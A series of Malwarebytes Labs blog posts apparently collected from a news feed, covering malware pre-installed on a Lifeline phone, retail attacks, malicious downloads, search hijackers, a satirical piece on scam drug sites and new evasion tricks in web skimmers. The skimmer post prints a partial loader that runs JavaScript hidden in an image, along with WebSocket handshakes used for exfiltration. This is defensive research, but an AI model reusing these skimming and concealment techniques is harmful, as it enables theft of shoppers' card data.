A United States–funded mobile carrier that offers phones via the Lifeline Assistance program is selling a mobile device pre-installed with not one, but two nefarious applications. Assurance Wireless by Virgin Mobile offers the UMX U683CL phone as their most budget conscious option. At only $35 under the government-funded program, it’s an attractive offering. However, what it comes installed with is appalling.

Not just malicious, but pre-installed

In October 2019, we saw several complaints in our support system from users with a government-issued phone reporting that some of its pre-installed apps were malicious. We purchased a UMX U683CL to better assist our customers and verify their claims.

We informed Assurance Wireless of our findings and asked them point blank why a US-funded mobile carrier is selling a mobile device infected with pre-installed malware? After giving them adequate time to respond, we unfortunately never heard back. Here’s what we discovered.

The first questionable app found on the UMX U683CL poses as an updater named Wireless Update. Yes, it is capable of updating the mobile device. In fact, it’s the only way to update the mobile device’s operating system (OS). Conversely, it is also capable of auto-installing apps without user consent.

Thus, we detect this app as Android/PUP.Riskware.Autoins.Fota.fbcvd, a detection name that should sound familiar to Malwarebytes for Android customers. That’s because the app is actually a variant of Adups, a China-based company caught collecting user data, creating backdoors for mobile devices and, yes, developing auto-installers.

From the moment you log into the mobile device, Wireless Update starts auto-installing apps. To repeat: There is no user consent collected to do so, no buttons to click to accept the installs, it just installs apps on its own. While the apps it installs are initially clean and free of malware, it’s important to note that these apps are added to the device with zero notification or permission required from the user. This opens the potential for malware to unknowingly be installed in a future update to any of the apps added by Wireless Update at any time. 

Not just pre-installed, but unremovable

It’s with great frustration that I must write about another unremovable pre-installed app found on the UMX U683CL phone: the mobile device’s own Settings app functions as a heavily-obfuscated malware we detect as Android/Trojan.Dropper.Agent.UMX. Because the app serves as the dashboard from which settings are changed, removing it would leave the device unusable.

Android/Trojan.Dropper.Agent.UMX shares characteristics with two other variants of known mobile Trojan droppers. The first characteristic is that it uses the same receiver and service names. The receiver name ends with ALReceiver and the service name ends with ALAJobService. These names alone are too generic to make a solid correlation. But, coupled with the fact that the code is almost identical, and we can confidently confirm a match. 

The only difference between the two codes are their variable names. The more discernible variant of this malware uses Chinese characters for variable names. Therefore, we can assume the origin of this malware is China.

Variant of malware with Chinese variable names

The second characteristic it shares is containing an encoded string within the code. Decoding this string reveals a hidden library file named

Decoded string with

Let’s take some time to look at how the code flows while decoding It first grabs the encoded string and decodes using Base64 decoding.

Encoded string
Base64 decoding

It then loads the decoded library into memory using DexClassLoader.

DexClassLoader loading decoded string

After the library is loaded into memory, it then drops another piece of malware known as Android/Trojan.HiddenAds.

Although we have yet to reproduce the dropping of additional malware ourselves, our users have reported that indeed a variant of HiddenAds suddenly installs on their UMX mobile device.

The malware origin

In addition to the malware being of Chinese origin, it’s noteworthy to mention that this UMX mobile device is made by a Chinese company as well. This could simply be a coincidence rather than explicit malcontent—we cannot confirm if the makers of the device are aware there is Chinese malware pre-installed.

No current resolution

Although we do have a way to uninstall pre-installed apps for current Malwarebytes users, doing so on the UMX has consequences. Uninstall Wireless Update, and you could be missing out on critical updates for the OS. We think that’s worth the tradeoff, and suggest doing so. 

But uninstall the Settings app, and you just made yourself a pricey paper weight. We do offer an attempt to remediate such pre-installed malware in our blog: The new landscape of pre-installed mobile malware: malicious code within. See section: Attempting to remediate.

Pre-installed malware getting worse, as foreshadowed

As I have highlighted in this blog and blogs past, pre-installed malware continues to be a scourge for users of mobile devices. But now that there’s a mobile device available for purchase through a US government-funded program, this henceforth raises (or lowers, however you view it) the bar on bad behavior by app development companies.

Budget should not dictate whether a user can remain safe on his or her mobile device. Shell out thousands for an iPhone, and escape pre-installed maliciousness. But use government-assisted funding to purchase a device and pay the price in malware? That’s not the type of malware-free existence we envision at Malwarebytes.

Final words on UMX U683CL

Having an actual UMX U683CL in my hands, I can tell you it is not a bad phone. It feels solid in hand and runs smoothly. Sure, it’s not the fastest mobile device, but it’s a fully capable smart phone. In general, without the malware, this device is a good option for anyone on a budget. 

It’s important to realize that UMX isn’t alone. There are many reports of budget manufactures coming pre-installed with malware, and these reports are increasing in number. Although I don’t have the answer to this widespread issue, I can say that US citizens using the Lifeline Assistance Program and many others on a tight budget deserve more. Stay safe out there.

Correction: An earlier version of this blog listed the UMX model as U686CL. The correct model is UMX U683CL. We apologize for the confusion.

The post United States government-funded phones come pre-installed with unremovable malware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

6 ways hackers are targeting retail businesses

Malwarebytes - Wed, 01/08/2020 - 18:04

Retail hacking is no new phenomenon, although it has increased in frequency over the last few years. In fact, retailers experienced more breaches than any other industry in 2019, and they’ve lost over $30 billion to cybersecurity attacks.

Both brick-and-mortar and online businesses experience retail hacking. Cybercriminals must often work harder to access online stores because these companies’ reputations ride on secure transactions. However, they’re not exempt from the flood of break-ins that happen during high-volume shopping seasons, including back-to-school, Black Friday, and the winter holidays.

Last-minute shoppers become the victims of retail hackers looking for simple ways in. Many consumers rush to buy gifts before the holidays sneak up on them, meaning they’re less diligent about scams and fraudulent sites. Shoppers might be willing to visit stores and webpages they’ve never been to before in search of hard-to-find items. Threat actors know this and take advantage of it with scarily authentic scams.

Even though the holidays have passed, shoppers should remain vigilant about scams and retail attacks—especially as web skimmers up the ante with social engineering tactics and evasion methods. Businesses, too, will benefit from strengthening their security protocols and staying up-to-date on the latest hacking methods.

1. Credential stuffing

Retail hackers frequently use credential stuffing, or the use of stolen usernames and passwords, to break into systems because it’s one of the easiest ways to siphon off data. Many people use the same passwords across multiple sites, which leaves them open to invasion. Hackers collect these credentials via purchase from the dark web or databases of personally identifiable information left online after massive breaches, and use them to hack into retailers and buy products.

Chipotle experienced a breach like this earlier in 2019, where costumers’ credit cards racked up hundreds of dollars in food purchases. However, many customers argued that their passwords were unique to Chipotle, which begs the question of how else cybercriminals could have accessed their accounts.

2. Near field communication (NFC)

Price scanners, cell phones, and card readers are notorious targets for NFC breaches. NFC technology allows customers to use their phones to purchase goods by tapping them against a reader.

Similarly, someone can scan a QR code and gain access to an exclusive app or land on a site where they can purchase items. Though NFC is convenient, retail hackers have little problem intercepting the data from its transactions and stealing information.

Even malware can pass from infected phones to retail systems. NFC technology is prevalent in face-to-face transactions, but more sites are hosting QR codes for users to scan. Hackers generally use several different ways to manipulate data transmitted over a distance:

  • Corruption: They use a third device to intercept a connection between two other electronic devices, which destroys the information being sent.
  • Eavesdropping: Cybercriminals pick up on private information by recording communications between two devices. Using this technique can give someone access to credit cards and other payment information.
  • Modification: The hacker manipulates the data before it reaches its intended source—meaning they can alter important details or inject malware or other harmful components.
3. RAM scraping

RAM scraping is a procedure hackers use to enter point-of-sale software. Every card transaction leaves data in the retailer’s terminal system. This information lasts temporarily as a part of the machine’s RAM, but threat actors can implant POS malware that reads this input before it disappears. By scraping this information, they obtain all the items stored on a card’s tracks—such as the account number, CVN, and expiration date.

The massive Target breach of 2013 is one example of RAM scraping in action. Text strings containing credit card information can remain in a retailer’s database for seconds, minutes, or hours. The longer it stays, the more chances hackers have for grabbing it before it goes.

4. Card readers

The magnetic strips on credit and debit cards make them frequent targets for cybersecurity attacks. Hackers don’t always need to force their way into online accounts—they can glean data from a single card swipe. Card data, which includes PINs and card numbers, remains encrypted until the moment of the swipe. Skilled criminals can take this opportunity to snatch the information and use it for themselves or sell it to others.

Many retailers and card companies have switched to chips instead of magnetic strips. Chips create a unique code that is only used for a single purchase. This form of EMV technology—which stands for Europay, Mastercard, and Visa—makes it harder to duplicate information and use it for subsequent transactions.

5. Web skimming

Web skimmers had quite a year in 2019, helped along by the criminal groups known collectively as Magecart, which were responsible for developing a slew of new techniques for stealing from online retailers and consumers alike.

Web skimmers sneak malware into website codes to glean personal information from customers. All e-commerce sites have a payment page for completing purchases, most of which are securely encrypted. However, those without airtight security are prime targets for web skimmers. This malware is hard to detect—especially for small businesses without advanced tech—and it can affect hundreds of customers at a time, making it a favorite among threat actors.

Skimmers enter sites through a third party, such as plug-in or an e-commerce page. These entryways are easier to get through because they often contain weaker code structure. (First-party entry commonly happens only to those small sites without strong cybersecurity measures in place.) Once the script infects the webpage, it funnels passwords, social security numbers, and credit card numbers back to the cybercriminals’ servers.

6. Social engineering

Social engineering might sound like a term too vague to be real, but this tactic is one of the oldest in the criminal book, useful for preying on emotions. In the pre-Internet days, someone might dress up as an employee of a department store and pretend to work there to access private information. They might ask other employees for information, knowing that some harried workers will readily supply it so they can return to their tasks. Others might loiter in front of a store and scam people out of cash using the old shoeshine technique.

Online, social engineering looks a bit different for retailers and shoppers. Websites might sell counterfeit goods at too-good-to-be-true prices, then snatch the personal information of customers while they’re at it. Watering hole attack strategies target hundreds of users at a time by analyzing their Internet browsing habits then laying siege at sites known to attract particular user groups, such as mommy blogs, gamers, or foodies. Phishing emails might pose as favorite retailers asking for account updates, while delivering malware or ransomware instead.

Beating web threats

With so many ways to steal information, it’s plain to see why retail cybercriminals often see success during the holidays and otherwise. Although retail hacking runs rampant during high shopping seasons, it doesn’t have to deter shoppers from completing their last-minute purchases. The onus is on businesses to secure their data and build trust with their consumers and partners.

Though no system is entirely unhackable, businesses should follow standard cybersecurity procedures and aim for the best defenses possible. Prioritizing user safety will allow them to build trustworthy relationships with their shoppers.

The post 6 ways hackers are targeting retail businesses appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Dubious downloads: How to check if a website and its files are malicious

Malwarebytes - Tue, 01/07/2020 - 17:45

A significant amount of malware infections and potentially unwanted program (PUP) irritants are the result of downloads from unreliable sources. There are a multitude of websites that specialize in distributing malicious payloads by offering them up as something legitimate or by bundling the desired installer with additional programs.

In November 2019, we learned that Intel removed old drivers, BIOS updates, and other legacy software from their site. While this software relates to products released in the last century and early years of the 2000s, many users still rely on old Intel products and have been left scrambling for specific downloads.

Users that follow older links to certain drivers and updates will find this instead:

Following the links to search the site or the download center only leads users around in circles—those downloads are gone. While some might argue that it is Intel’s right to remove drivers and updates after a decade, others understand that whenever legacy software is abandoned, a security nightmare ensues.

When users can no longer download files from official sources, desperate people will roam the Internet for a place where they can find the file they need. And what they usually find instead are malicious websites and downloads.

Malvertising using popular downloads

Habitually, threat actors find out which search terms are gaining in popularity as users seek out terminated software downloads and try to lure searchers to their site. They will use SEO techniques to rank high in the search results or may even spend some dollars to show up in the sponsored results for certain keywords. They can hide their malware in malvertising in the form of downloads or even drive-by-downloads, in which users needn’t install a single file, only visit the site, to be infected.

After all, a victim that is desperately looking for a file he needs to get a system up and running again is really all a malware peddler could wish for. All they have to do is make the user of the site believe they have found the file they are looking for. Once they are convinced, they will download and install the alleged driver all by themselves.

All the threat actor has to do is upload the malware under some convincing filename and attract visitors to the site. This is basically the same modus operandi that you will find in use when people go looking for cracks and keygens.

So, what can users do to avoid falling victim to such a scam? A couple of things, as it happens. We will provide you with some checks you can do before you visit the download site. And there are some checks you can perform before you run the downloaded file, too.

Checks you can perform to assess the website

When you have found a site that offers a file for download, there are a few actions you can take to check whether the site is trustworthy. They are:

  • Check for the green padlock
  • Read third-party reviews of the website
  • Use a trusted antivirus or browser extension, such as Browser Guard

Checking for the presence of the green padlock is a good start to ensure a site has purchased a security certificate, but it’s also not a guarantee that the website is safe. SSL certificates are cheap, and your neighborhood cybercriminal knows where to get them practically for free. If you click on the green padlock, you can find out who issued the certificate and for which site.

Recommended reading: Explained: security certificates

There are many websites that offer reviews of download sites and domains, and while many of these sites are reputable, they tend to fall a little bit behind in adding Internet newcomers. Our cybercriminal can afford to dump a domain like a hot potato once it has racked up too many bad reviews, then purchase a new site from which to run his scheme.

In short, you can trust reviews about sites that have been around for a while, but the lack of reviews for a site could mean they only started or they may be up to no good.

Some cybercriminals are brilliant programmers. Most are not. But all the successful ones have one skill in common: They are well-versed in tricking people. So, don’t accept a website as trustworthy just because it features logos of other trustworthy companies on its pages. Logo images are easily found in online searches, and they could be planted on the site for exactly that reason: to gain the visitors’ trust. Logos could also be stolen, unauthorized, or handed out for different reasons than you might expect.

Some browsers and some free applications warn you about shady sites—especially sites they know to be the home of malware and scammers. Malwarebytes Browser Guard, for example, can be installed on Chrome and Firefox, adding to the browsers’ own capabilities to recognize malicious domains and sites.

How do I filter possible malware from the downloaded files

There are some methods you can use to weed out the bad boys in your download folder:

  • Compare the checksum to the original file
  • Look at the file’s digital signature
  • Run a malware scan

A checksum is a sequence of numbers and letters used to check data for errors. If you know the checksum of the original file, you can compare it to the one you have downloaded. Windows, macOS, and Linux have built-in options to calculate the checksum of a file.

The digital signature of a Windows executable file (a file with an .exe extension) can be verified after the file has been downloaded and saved. In your Downloads folder, right-click the downloaded .exe file and click Properties. Here you can click on the Digital Signatures tab to check whether the downloaded file is signed by the expected party.

Finally, use your anti-malware scanner to double-check that you are not downloading an infected file. You can also use online scanners like VirusTotal, which will also provide you with a SHA-256 hash for the file and save you the trouble of calculating a checksum.

Much ado about what?

All this may seem like a lot of work to those who habitually download files without a worry in the world. However, even the most practiced downloader eventually has their moment of truth—when that downloaded file wrecks their computer or all those bundled applications are harder to remove than expected.

People who download all the time have better instincts about which sites to trust or not, but that doesn’t mean they can’t be fooled. From experience, they know the sites that offer malware under a different filename from the sites that offer clean files. But sometimes, we reach for the shiny golden delicious and, once we take a bite, discover it has a worm.

We don’t all have the stomach or the knowledge to clean an infected computer. And some systems are not ours to put at risk.

Even if you follow all these pointers to the letter, it is still riskier to download files from unknown sites than it is to download from the company that made them. So we would like to urge companies to keep their “old files” available on their own site, even if the number of downloads has dwindled.

Stay safe, everyone!

The post Dubious downloads: How to check if a website and its files are malicious appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Billion-dollar search engine industry attracts vultures, shady advertisers, and cybercriminals

Malwarebytes - Mon, 01/06/2020 - 20:04

Search engines make money by showing users sponsored advertisements—a lot of money. This attracts attention, competition, and plenty who want a piece of the action without doing the actual work or considering the impact to those on the other end of the search bar. Because in the search business, even the crumbs are interesting.

In this post, we look at the ways in which shady advertisers, cybercriminals, and other vultures try to siphon off profits from the search engine business using sneaky tech tactics that ultimately harm users more than the search engines themselves.

How exactly do search engines make money?

Every time someone clicks on a sponsored advertisement, the requisite search engine earns money on a pay-per-click basis. They are paid by advertisers, who shell out for beneficial placement in the search results for keyword phrases of their choice.

As a result of the popularity of these search engines—Google in particular—US companies spend an estimated $80 billion on search engine optimization (SEO) alone. And the leading search engines are owned by some of the most valuable technology companies around.

Default search engine

Knowing this may make it easier to understand why browser hijackers are so keen on changing the default search engine on your favorite browser. They get a piece of the pie for referrals, and this entices them to use several methods to have your searches run through their hands. If a hijacker manages to change your default search engine to their own, they can profit from your searches.

But there are other profitable ways to interfere with your search results:

  • Newtabs are browser hijackers that open a new tab with a site or page set by the hijacker. These pages usually contain a search bar. The goal is to get the user to enter his queries in that search form instead of searching from the address bar, which would still point to the default search engine.
  • Startpage hijackers change the startpage of the affected browser for very much the same reasons as newtabs, just on different browsers.
  • Searchpage hijackers are mostly browser extensions that can read and change the data on a number of websites. In these cases, the websites are the major search engines. Search hijackers come in a few major flavors:
    • Redirects from major search engines are forced to a site owned by the hijacker. Sometimes the results will be displayed there, but sometimes you get sent back with only a referral added to your query. The referrals are what pays the hijackers.
    • Sponsored results are added to the results retrieved by major search engines and sometimes presented as if you are using a whole new search engine. At other times the changes are so minimal you may never notice.
    • Sponsored results are added to the results of major search engines and presented as if they were the original results.
    • Redirected searches occur from a major search engine to another search engine. The hijacker feeds your query to another engine and adds its referral on the fly.

Each of the above methods are in use by major families of potentially unwanted programs (PUPs) and adware. While neither of these threat categories are considered malware, they inhibit users’ ability to view clean, original search results using the engine of their choice, ultimately interfering in their online experience.

More invasive methods of profiting from search results

Seeing the potential for profit windfall, PUPs and adware have found other, more invasive ways of making money from your searches—methods that interfere with the displayed results. These include:

  • Search result changers that give paying sites a better position without disclosing that they are paid.
  • SEO poisoning that artificially acquires a better page rank.
  • Ad fraud, which dupes advertisers into believing they have displayed their advertisement on affected machines, while the user of such machine may not have noticed anything at all.

Page rank describes how high up in the search results your entry shows up. The higher the better is the general consensus, but you surely want to be on the first page. If people spot a search result likely to fulfill their quest for knowledge on the first page of results, they typically click on that link before even bothering to look at the other pages of results. Many are known to follow the first link beneath the sponsored results.

How do you achieve a good page rank? Search engines use many different algorithms to decide on the order in which to display results, but one of the main criteria is to have lots of incoming links to the webpage, with the understanding that links from reputable sites have heavier weight.

SEO poisoning is hard to do on the major search engines: They’ve seen every trick in the book and are vigilant about banning those tactics as fast as they can. So if you abuse the position of being marked as a reputable site, you might lose it a lot faster than you gained it. It will only render short-term effects, which works for those going for fast cash, but not for long-term business.

Fake privacy extensions

There are many ways to make changes to search engines and search results on a system affected with PUPs or adware, but the most popular method is to seduce victims into installing a browser extension that promises some kind of functionality.

It is typical to see search hijackers promising to guard your online privacy or act as an ad blocker, as both of those plugins require users to grant them permission to view or have control over a wide range of data and computer settings. Because of this, it is important users vet potential privacy extensions and ad blockers thoroughly before downloading.

Example hijackers

Let us show you some examples of the different search hijackers and the permissions they need to pull off their dirty work. I’ll use the permissions prompts for Chrome extensions only, but most of these hijackers also exist in the Firefox realm.

Example 1: Changing default search

Your default search settings will be changed, which is a red flag. This type of extension usually promises you some functionality that explains the need for such a permission.

Example 2: Changing results

Changing your data in this case means they will alter the search results from the three major search engines: Bing, Google, and Yahoo. The fourth listing is for the origin of this extension.

Example 3: Adding a search bar on the new tab:

The page that gets displayed when you open a new tab will hold a search form that leads to the search site belonging to the extension.

Example 4: The kitchen sink

This extension changes the newtab and the default search; a multi-vector attack so to speak. It also requires other permissions, such as reading browsing history and managing downloads, that I would shy away from for privacy reasons.

Example 5: Adding sponsored results to your Google results:

This one fetches the results from Google and then adds a tiny header and a bunch of sponsored results.

This will be shown next to the sponsored results. Search engine thieves are hard to find

We see a lot of complaints from people wondering what caused their search experience to change and how. Most of the time, it is because of an extension like the examples shown above. Many people don’t realize the extensions are the culprit because they were installed for a different reason, sometimes even from a reputable source or as part of a bundle—sometimes pretending not to install at all. But reading between the lines of the fine print in those permission requests—or just plain reading them at all—can give you insight into how your search engine and browser experience became tangled up in PUPs and adware.

We hope that this post (and a scan from a reputable antivirus program like Malwarebytes or Browser Guard) will help solve those problems in the future.

Stay safe, everyone!

The post Billion-dollar search engine industry attracts vultures, shady advertisers, and cybercriminals appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (December 30 – January 5)

Malwarebytes - Mon, 01/06/2020 - 17:20

Last week on Malwarebytes Labs, we took a dive into edge computing, looked at new web skimmer techniques, and rolled our eyes at silly people doing silly things.

Other cybersecurity news:

Stay safe, everyone!

The post A week in security (December 30 – January 5) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How not to buy drugs on the Internet

Malwarebytes - Fri, 01/03/2020 - 18:52

Disclaimer: This post is satirical in nature and meant to educate on the proliferation of scams, misinformation, and traps set up to trick those engaging in illicit or illegal activities online. Malwarebytes does not condone buying drugs on the Internet.

Perhaps you’re sitting at work one day when suddenly the thought crosses your mind: You’re going to shift careers to become a drug lord so powerful, it will put Scarface to shame. Given that you’re not currently connected to a network of cocaine suppliers, distributors, and money launderers, you naturally turn to the Internet.

But users beware: Those get-rich-quick schemes almost never work out, and that includes cashing in your good citizen chips to sell drugs. And, surprise, surprise, not all websites promising kilos of cocaine with quick shipping are being 100 percent honest with you. Let’s set out and see what we find.

Searching for suppliers

As aspiring drug lords, our first search is “buy cocaine online,” which yields hxxp://

Naturally, to take advantage of the free shipping, we’ll want to buy in bulk:

There are a few red flags though, mainly in that the site owners purport to take PayPal. Like most scams, you can spot the con by looking at what sort of payment they accept. PayPal leaves a digital trail that is trackable, and PayPal as a company frequently turns data over to all levels of law enforcement. So perhaps not the greatest method of getting our hands on an illicit product.

But there’s a WhatsApp number listed, so we can search on 1 (502) 509 5319. That yields the following:

This is more promising, as Chinese pharma manufacturers have been known to sell online to western consumers, both via clearnet and dark net markets. Also, there’s a Wickr ID. While use of an encrypted messenger service certainly doesn’t eliminate the possibility of a scam, drugs are brokered with the service, sometimes in person. Searching further on the Wickr ID:

No cocaine, but a significant amount of heavy pharmaceuticals with a shipping location listed as Shanghai, China. Dropping our drug lord aspirations for a moment, Chinese fentanyl and carfentanil are commonly seen as a huge contributing factor to a surge in opioid overdoses and deaths in the US. While this particular listing may or may not be a scam, acquiring real, deadly opiates via clearnet and mail is generally way too easy.

The Cnchemex handle appears on a site (now down) using an Indian name server, as well as a classified ad site targeting the overseas Indian community, suggesting the actor might be misrepresenting their location. That said, real sellers doing real harm use similar methods to push product overseas.

Why is this so easy? Bargain hosting

hxxp:// is hosted by Namecheap, a well-known, low cost host. Bargain hosts have a tendency to make their profits on volume, creating a business incentive toward taking all comers as fast as possible, with as little friction as possible. Great for reducing barriers of entry for low-resource users. Less great for keeping scams and malware out, as well as tracking bad actors.

Most low-cost hosts do not keep blacklists for prior bad acts, and some don’t even consider certain scams malicious if they don’t damage the user’s machine. As a result, scammers who take lots of money for “drugs” and never deliver can trivially move from one site to another without incurring significant infrastructure costs, or any significant fear of being permanently banned.

Lessons learned

The site above and those like it are pretty obvious scams 99 percent of the time. It’s easy to mock scams when they take advantage of users looking for illegal activities. But scammers like to diversify their income streams and will often use similar tactics and infrastructure for more harmful activities.

Ultimately, these scams are merely symptomatic of poorly-designed monitoring systems and underfunded security teams that allow both petty scams and destructive malware to slip through the net. Less fraud and a better Internet depend on addressing the systems failures that generate these vectors, as well as users who exercise a bit of critical thinking when presented with something too good to be true. And that includes becoming a drug lord via Internet search.

Stay vigilant and stay safe.

The post How not to buy drugs on the Internet appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New evasion techniques found in web skimmers

Malwarebytes - Mon, 12/30/2019 - 22:25

For a number of years, criminals have been able to steal credit card details from unaware online shoppers without attracting too much attention. Few people in the security industry were talking about these credit card web skimmers, both server-side and client-side, before the latter became largely known as Magecart.

It took some major incidents, notably the Ticketmaster and British Airways breaches, to put this growing threat under the spotlight and finally raise awareness among online merchants and consumers.

Under pressure from greater scrutiny, in particular from a number of security researchers, some threat actors started to evolve their craft. This is a natural reaction, not limited to web skimmers, but one that applies to any malicious enterprise, cyber or not.

One such recent evolution includes two new evasion techniques adapted for client-side web skimmers used to conceal their fraudulent activity.

Steganography: a picture worth a thousand secrets

Steganography has long been used by malware authors as a way to hide data within legitimate-looking images. Back in 2014, we described a new variant of the Zeus banking Trojan called ZeusVM, which was hiding its configuration data within a picture of a beautiful sunset.

In the context of website security, hiding malicious code in picture files is a great way to go undetected. Take, for example, an e-commerce website and the various components it loads—many of these will be logos, product images, and so forth.

On December 26, @AffableKraut disclosed the first publicly-documented steganography-based credit card skimmer. To the naked eye, the image looks like a typical free shipping ribbon that you commonly see on shopping sites.

Figure 1: A free shipping logo found on a shopping site

The only indication that there might be something amiss is the fact that the file is malformed, with additional data found after the normal end of the the file.

To better understand what and where this data might be, we can look at the image in a hex editor. The File Interchange Format (JFIF) for the JPEG encoding has a specific structure. We used Ange Albertini’s diagram as a guide.

Figure 2: Looking at the image structure from the beginning of the file

So far, the image meets its requirements, and there does not appear to be anything special about it. However, if we remember what we saw in Figure 1, extra data was added after the final segment, which has the marker FF D9.

Figure 3: Looking at the structure of the image, after the normal end of file

Now we can see JavaScript code beginning immediately after the end of file marker. Looking at some of its strings such as onestepcheckout or authorizenet, we can deduce immediately that this is the credit-card skimming code.

All compromised sites we found using a steganographic skimmer were injected with similar code snippets (typically after the footer element or Google Tag Manager) to load the fake image and parse its JavaScript content via the slice() method.

var xhr = new XMLHttpRequest();'GET', '[image path]', true);
xhr.onreadystatechange = function() {
if (this.readyState != 4) return;
if (this.status == 200) {
var F=new Function (this.responseText.slice(-[number]));

As it happens, the majority of web crawlers and scanners will concentrate on HTML and JavaScript files, and often ignore media files, which tend to be large and slow down processing. What better place to sneak in some code?

Several years ago, there were major malvertising campaigns redirecting victims to the Angler exploit kit, one of the most advanced toolkits leveraged to infect users with malware. One threat actor used a similar technique by concealing fingerprinting code within a fake GIF image. At the time, this was the crème de la crème of malvertising techniques.

In a sense, any file loaded directly or from a third party should be deemed suspicious. @AffableKraut links to an open source file scanning system called Strelka that may be helpful for defenders in detecting anomalous files.

Figure 4: Malwarebytes blocking a skimmer using steganography WebSockets instead of HTTP

WebSocket is a communication protocol that allows streams of data to be exchanged between a client and server over a single TCP connection. Therefore, WebSockets are different than the more commonly-known HTTP protocol, which consists of requests and responses to a server from a client.

Figure 5: Comparing WebSocket and HTTP protocols

While WebSockets are advantageous for real-time data transfer, this is not the reason threat actors may be interested in them. For their particular use case, WebSockets provide a more covert way to exchange data than typical HTTP requests-responses.

With web skimmers, there are certain artifacts we look for:

  • Skimmer code injected directly into a compromised site (JavaScript in the DOM)
  • Skimmer code loaded from an external resources (script tag with src attribute)
  • Exfiltration of the stolen data (HTTP GET or HTTP POST requests with encoded data)

However, WebSockets offer yet another way of exchanging data, as found by @AffableKraut. The first component is the skimming code itself, followed by the data exfiltration.

The attackers do need to load a new WebSocket and that can be detected in the DOM. However, they were clever to obfuscate the code nicely enough that it completely blends in.

Figure 6: Malicious code that secretly loads the WebSocket

The goal is to conceal a connection to a server controlled by the criminals over a WebSocket. Once this JavaScript code runs in the browser, it will trigger the following client handshake request:

Connection: Upgrade
Pragma: no-cache
Cache-Control: no-cache
User-Agent: {removed}
Upgrade: websocket
Origin: https://www.{removed}.com
Sec-WebSocket-Version: 13
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Sec-WebSocket-Key: {removed}
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits

It will be followed by the server handshake response:

HTTP/1.1 101 Switching Protocols
Server: nginx/1.12.2
Date: {removed}
Connection: upgrade
Upgrade: websocket
Sec-WebSocket-Accept: {removed}
EndTime: {removed}
ReceivedBytes: 22296
SentBytes: 57928

Once this is established, a series of bidirectional messages will be exchanged between the client (victim’s browser) and server (malicious host). A larger Base64 encoded blurb is downloaded onto the client and processed as JavaScript code. This turns out to be the credit card skimming code.

Figure 7: The WebSocket messages, downloading the skimmer and then leaking CC data

The following smaller messages are exfiltration attempts of form fields present on the checkout page. The data has been encrypted to make it less obvious. We can see that there are duplicates, just like what we also encounter with some traditional skimmers that trigger the exfiltration based on a repeated timer event.

WebSockets were also used by another web threat, which at the time was making headlines almost daily: cryptojacking. In this case, it wasn’t so much for concealment but efficiency, as the in-browser mining process had to send back hashes to the server for each new mining job. However, we did notice the use of WebSockets in tandem with proxies in order to evade detection.

Figure 8: Malwarebytes blocking a skimmer using WebSockets Different tricks, same protection

The techniques described in this blog will no doubt cause headaches for defenders and give some threat actors additional time to carry on their activities without being disturbed. But as mentioned before, this kind of cat-and-mouse game was to be expected in the light of regular new publications on Magecart and web skimmers.

There are other ways to hide and load malicious scripts. Although the technology is being retired, Flash Player via ActionScript was also a great vehicle for many malware campaigns. For instance, a famous redirection infrastructure called EITest used to have a SWF file that loaded a malicious iframe to an exploit kit.

While the majority of malware authors will keep using traditional methods, more advanced actors will come up with new ways to evade detection. Some techniques may be targeted at researchers, while others may be intended to bypass web crawlers.

At Malwarebytes, we continue to monitor the shift in this threat landscape to keep our users safe. Protection against web skimmers is available through our Malwarebytes software.

We would like to thank @AffableKraut for sharing details about these skimming techniques.

The post New evasion techniques found in web skimmers appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Explained: edge computing

Malwarebytes - Mon, 12/30/2019 - 18:41

Edge computing may seem like a foreign and future-facing term. Yet its applications are widespread and diverse, with the ability to transform the way we store, use, and share data and programs online. The implications of edge computing are far-reaching, trickling down from software development and business applications to everyday computing—even to gameplay.

Recently, I followed a discussion about whether online gaming’s performance and graphics could ever compare to that of consoles. Gaming consoles typically provide users with faster action, more detailed environments and precise movements, quicker reaction times, and higher resolution than online games.

While some stated that online games could never measure up, others noted that the gaming industry keeps moving its focus toward online play. Redbox, for example, has stopped offering physical video games for rent. So will gamers have to forever trade game performance and quality for ease-of-use? Or can they have both? If game developers want to make this dream a reality, it will certainly involve edge computing.

What is edge computing?

Edge computing is, by definition, a method by which data storage and computation happens closer to the location where it’s needed, reducing latency and improving bandwidth while using cloud-based applications. This can be a huge benefit for those streaming videos, opening large files, or playing online games. To accomplish this, we might see Content Delivery Networks (CDNs), or networks of proxy servers set up in different locations, combined with cloud functionality to deliver the requested data almost directly to the user.

As more and more applications move to the cloud, shared bandwidth becomes increasingly problematic. Edge computing, then, is being hailed as the next movement in software development and data storage. Let’s explain a few of the ground principles of edge computing to understand how this principle will apply across the technologies we know and use every day.

Latency in computing

Latency is the time interval between a stimulation and the response, or, to simplify even further, a time delay between the cause and the effect of some physical change in the system being observed. Latency can happen in the human nervous system, in mechanical engineering, and, of course, in computing. Whenever witnessing a streaming service buffer, a pinwheel rotate around and around, a web page slow to load—that’s latency in a nutshell.

In that context, network latency describes the delay that takes place during communication over a network (including the Internet). Latency mostly depends on the type of connection and the proximity of the nearest server.

For a regular Internet connection, a latency of 100 ms (milliseconds) is considered acceptable today—though users are arguable becoming less and less patient. For a good gaming experience, you would want latency of 30 ms or less. In virtual reality applications, any latency above 7 ms produces motion sickness.

Content delivery networks

Content delivery networks (CDNs) are systems of distributed servers (networks) that deliver web content to a user based on their geographic location, the origin of the webpage, and the content delivery server itself.

In layman’s terms, this means that the information is copied to servers around the globe and a user gets the information from the server closest to him that has the requested information available. This also allows for geo-specific content to be distributed for optimal usage. After all, having a Dutch EULA on a server in Japan doesn’t make a lot of sense.

CDNs, as mentioned above, will provide a critical pathway from data stored in the cloud to the user, essentially bouncing the information from a single massive server to the servers closest to the exchange of data (the web content and the user).

The cloud

This is where the equation for edge computing comes together—at the edge of the cloud. CDNs alone can’t accomplish delivering all necessary data to accomplish solving for latency while allowing easier access. Cloud computing, then, or the delivery of on-demand computing resources, such as applications and data centers over the Internet, completes the formula.

Cloud resources are often split up in three ways:

  • Public: Cloud services are delivered over the Internet and sold on demand, which provides customers with a great amount of flexibility. You only pay for what you need.
